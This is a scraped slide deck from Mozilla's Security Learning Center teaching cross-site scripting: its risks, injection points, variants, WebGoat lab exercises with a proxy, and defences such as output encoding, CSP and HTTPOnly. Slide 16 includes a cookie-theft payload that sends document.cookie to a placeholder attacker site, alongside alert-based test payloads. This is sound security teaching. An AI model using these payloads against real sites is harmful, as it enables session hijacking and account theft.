Cross Site Scripting - Mozilla Security Learning Center
â˘Transferir como KEY, PDFâ˘
5 gostaramâ˘6,061 visualizaçþes
Introduction to cross site scripting
Recomendados
Mais conteĂşdo relacionado
Mais procurados
Mais procurados (20)
Semelhante a Cross Site Scripting - Mozilla Security Learning Center
Semelhante a Cross Site Scripting - Mozilla Security Learning Center (20)
Mais de Michael Coates
Mais de Michael Coates (10)
Ăltimo
Ăltimo (20)
Cross Site Scripting - Mozilla Security Learning Center
- 1. Mozilla Security Learning Center Cross Site Scripting
- 2. Agenda ⢠Business risk of XSS ⢠Understanding the vulnerability ⢠Attack scenarios ⢠Mitigation techniques ⢠Security enhancements
- 3. Setup ⢠http://people.mozilla.org/~mcoates/ WebSecurityLab.html#installation ⢠http://bit.ly/MozLab ⢠Download Virtual Box, OWASP Broken Web App VM
- 4. Agenda ⢠Business risk of XSS ⢠Understanding the vulnerability ⢠Attack scenarios ⢠Mitigation techniques ⢠Security enhancements
- 5. Risks of XSS ⢠Top Web Security Issue on OWASP Top 10 (2011, 2007, 2004) ⢠Impact: Vulnerability allows attacker to change any aspect of a vulnerable web page ⢠Business Impact: ⢠Compromise of user accounts ⢠False data displayed on website ⢠Remote monitoring of user actions with website ⢠Full attacker control of content displayed and served from website
- 6. XSS in the News
- 7. Agenda ⢠Business risk of XSS ⢠Understanding the vulnerability ⢠Attack scenarios ⢠Mitigation techniques ⢠Security enhancements
- 8. Fundamental Problem ⢠Confusion between data for display and data to execute ⢠Example: Forum message discussing JavaScript What does <script>alert(âhiâ)</script> do?
- 9. XSS Example - Intended Use (1) User submits their name Bob Name:_____ submit (2) Page displays name Hello: Bob submit
- 10. XSS Example - Attack (1) Attacker submits malicious code javascript Name:_____ submit (3) Malicious site steals passwords & installs malware (2) Code is now part of webpage <div class=âfeaturedâ> Login: ___ Pass: ____ <form action=â/en-US/firefox/ users/loginâ method=âpostâ id=âloginâ class=âfeatured-inner object-leadâ> submit to evil site javascript <install malware> <div> <input type=âhiddenâ name=âdata[Login][referer]â
- 11. XSS Points of Attack ⢠HTML Element Content <b>Hello <script>alert(1)</script></b> ⢠HTML Attributes <input type="text" value=" "><script>alert(1)</script> " > <input type="text" value=" "onmouseover= " alert(1) " > ⢠JavaScript <script>x='a'</script><script>alert(1);x= 'a'</script> ⢠CSS #Xsstc { background-image: url('about:blank#Hello%20World'); } ⢠HTML URL Parameters <a href="http://www.site.com?test= "><script>alert(1)</script><hr >
- 12. Variations ⢠Reflected ⢠Attack code not stored in vulnerable site ⢠Exploit delivered via malicious link ⢠Stored ⢠Attack code stored in vulnerable site ⢠User exploited by visiting vulnerable page ⢠Dom ⢠Client side only, no server record
- 13. Agenda ⢠Business risk of XSS ⢠Understanding the vulnerability ⢠Attack scenarios ⢠Mitigation techniques ⢠Security enhancements
- 14. WebGoat ⢠Click First Link - OWASP WebGoat version 5.3.x ⢠Username / Password is guest / guest
- 15. Setup ⢠http://people.mozilla.org/~mcoates/ WebSecurityLab.html#installation ⢠http://bit.ly/MozLab ⢠Download Virtual Box, OWASP Broken Web App VM
- 16. Cross Site Scripting (XSS) ⢠Problem: User controlled data returned in HTTP response contains HTML/JavaScript code ⢠Impact: Session Hijacking, Full Control of Page, Malicious Redirects ⢠Basic XSS Test: â ><script>alert(document.cookie)</script> ⢠Cookie Theft Example: â><script>document.location='http://attackersite/ '+document.cookie</script>
- 17. Lab! - Reflected XSS
- 18. Reflected XSS Lab ⢠Lesson: Cross-Site Scripting->Reflected XSS Attacks ⢠Proxy Not Needed
- 19. Using A Proxy ⢠Burp - Configure to listen on 8080 ⢠Ensure âloopback onlyâ is checked (will be by default)
- 20. Set Firefox Proxy ⢠Set Firefox proxy to 8080 ⢠Preferences -> Advanced -> Network -> Settings ⢠Set HTTP Proxy ⢠Important - clear âNo Proxy forâ line
- 21. Confirm Setup Works ⢠Refresh Web Browser - it should hang ⢠Go to Burp -> Proxy -> Intercept (they are highlighted) ⢠Click âForwardâ for all messages ⢠Should now see page in browser
- 22. Confirm Setup Works ⢠Intercept is on ⢠Each request will be caught by proxy ⢠Requires you to hit forward each time ⢠Intercept is off ⢠Requests sent through proxy automatically ⢠Logged in tab âproxyâ->âhistoryâ
- 23. âHello Worldâ of Proxies ⢠Lesson: General->Http Basic ⢠Objective: ⢠Enter your name into text box ⢠Intercept with proxy & change entered name to different value ⢠Receive response & observe modified value is reversed Joe Sue Attackerâs euS euS Web Proxy Web Server Browser
- 24. Lab! - Stored XSS
- 25. Stored XSS Lab ⢠Lesson: Cross-Site Scripting->Stored XSS Attacks ⢠Proxy Not Needed
- 26. Agenda ⢠Business risk of XSS ⢠Understanding the vulnerability ⢠Attack scenarios ⢠Mitigation techniques ⢠Security enhancements
- 27. XSS Prevention ⢠Solution 1. Output Encoding - converts command characters to benign characters 2. Input Validation - secondary, best practice View Source: View Source: <td>test message - <td>test message - â><script>alert(docu "><script>ale ment.cookie)</ rt(document.cookie)</ script> script> </td></tr> </td></tr>
- 28. Agenda ⢠Business risk of XSS ⢠Understanding the vulnerability ⢠Attack scenarios ⢠Mitigation techniques ⢠Security enhancements
- 29. Content Security Policy (CSP) ⢠CSP - New defensive control to eliminate XSS Name:_____ ⢠Allows web site to specify where JavaScript can be loaded submit from ⢠Injected JavaScript via XSS is CSP Policy rendered inert X-Content- ⢠Violations & potential XSS Security-Policy: allow 'self'; img-src attacks are reported to web site for investigation 'self' data:
- 30. XSS Example with CSP (1) Attacker submits malicious code javascript Name:_____ submit (2) CSP prevents script execution (3) Site safe to use <div class=âfeaturedâ> <form action=â/en-US/firefox/ users/loginâ method=âpostâ id=âloginâ class=âfeatured-inner object-leadâ> Name:_____ javascript <div> <input type=âhiddenâ submit name=âdata[Login][referer]â value=â/en-US/developers/addonsâ id=âLoginRefererâ /><input Violation report sent to site.com/CSPalert
- 31. Implementing CSP ⢠Some code changes needed to externalize JavaScript ⢠Run CSP in report only mode to test ⢠Enable CSP and protect users with browsers supporting CSP ⢠Receive alerts on potential vulnerabilities in app and quickly address to protect remaining users
- 32. CSP Violation Reporting ⢠Violations of CSP policy reported to specified URL X-Content-Security-Policy: ⢠Acts as XSS intrusion allow self; report-uri http:// reportcollector.example.com/ detection system collector.cgi ⢠CSP supported in portion of site users, XSS IDS benefits all ⢠Reported data is from client, trust accordingly
- 33. CSP Violation Reporting CSP Violation javascript ⢠Report Includes: ⢠HTTP Request Violation report sent to site.com/CSPalert ⢠request-headers ⢠blocked-uri ⢠violation-directive ⢠original-policy
- 35. Other CSP Benefits ⢠Prevent ClickJacking via frame-ancestors ⢠Control embedded frames via frame-src ⢠Control domains for images via img-src ⢠Control target domains via xhr-src ⢠Enforce specific protocols (https://*.foo.com) ⢠Future enhancement to control actions & malicious forms
- 36. Protecting Outdated Users ⢠HTTPOnly mitigates one of XSS impacts - session hijacking ⢠Supported in all recent browsers ⢠Easy, opt-in security control to protect users Attackerâs Site javascript Cookie: SessionID
- 37. Summary ⢠XSS ⢠Untrusted user data not properly handled in response ⢠Exists with user data in HTML, JavaScript, CSS, etc ⢠Defensive Design ⢠Encode for context - HTML Entity encoding, JavaScript encoding, etc ⢠Content Security Policy - Strong layer of defense ⢠HTTPOnly flag - Easy add for some benefits ⢠More Info - OWASP XSS Prevention Cheat Sheet
- 38. Next Sessions ⢠Upcoming ⢠August 16, 2011 - Hands-On Hacking Brownbag - SQL Injection ⢠August 25, 2011 - OWASP Bay Area Chapter Meeting ⢠https://wiki.mozilla.org/WebAppSec#Schedule ⢠https://blog.mozilla.com/webappsec/
Notas do Editor
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- * request\nThe HTTP request line leading to the policy violation; this includes the method, resource path, and HTTP version.\n* request-headers\nThe HTTP headers that were sent resulting in a violation of the Content Security Policy.\n* blocked-uri\nThe URI of the resource that was blocked from loading by the Content Security Policy. This is not sent in the cast of frame-ancestors\nviolations; in that case, you should assume the blocked URI is the same as the request URI.\n* violated-directive\nThe name of the policy section that was violated.\n* original-policy The original policy as specified by the X-Content-Security-Policy HTTP header.\n
- \n
- \n
- \n
- \n
- \n